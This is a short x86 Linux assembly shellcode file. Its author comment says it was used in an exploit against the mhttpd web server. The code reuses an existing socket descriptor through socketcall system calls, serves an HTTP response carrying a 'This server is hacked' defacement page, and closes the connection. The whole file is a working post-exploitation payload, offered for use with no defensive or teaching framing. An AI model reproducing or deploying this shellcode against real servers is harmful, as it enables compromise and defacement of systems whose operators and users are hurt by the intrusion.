; Used in my mhttpd exploit, it grabs a socket
; file descriptor and starts serving a web page
; on it.
;
; zillion[at]safemode.org 

BITS 32

jmp short hello
aloha:

pop 		esi
xor 		eax,eax
xor 		ebx,ebx
xor 		ecx,ecx

mov             al,102
mov		bl,4
mov		cl,3		
mov long	[esi],ecx
mov             cl,1
mov long	[esi + 4],ecx
mov		ecx,esi
int             0x80

xor             eax,eax
inc             ebx
mov long        [esi + 4],eax
mov long        [esi + 8],eax
mov             al,102
int             0x80   

mov		ebx,eax
lea             ecx,[esi + 12]   
mov             dl, 120        
mov             al,4 
int             0x80           

xor		eax,eax
mov		al,6
int		0x80


hello:
call aloha
db 'AAAABBBBCCCC'
db 'HTTP/1.1 200 OK',0xa
db 'Server: safemode',0xa
db 'Content-Type: text/html',0xa,0xa
db '<HTML><center><H2>!! This server is hacked !!</h2><center><HTML>'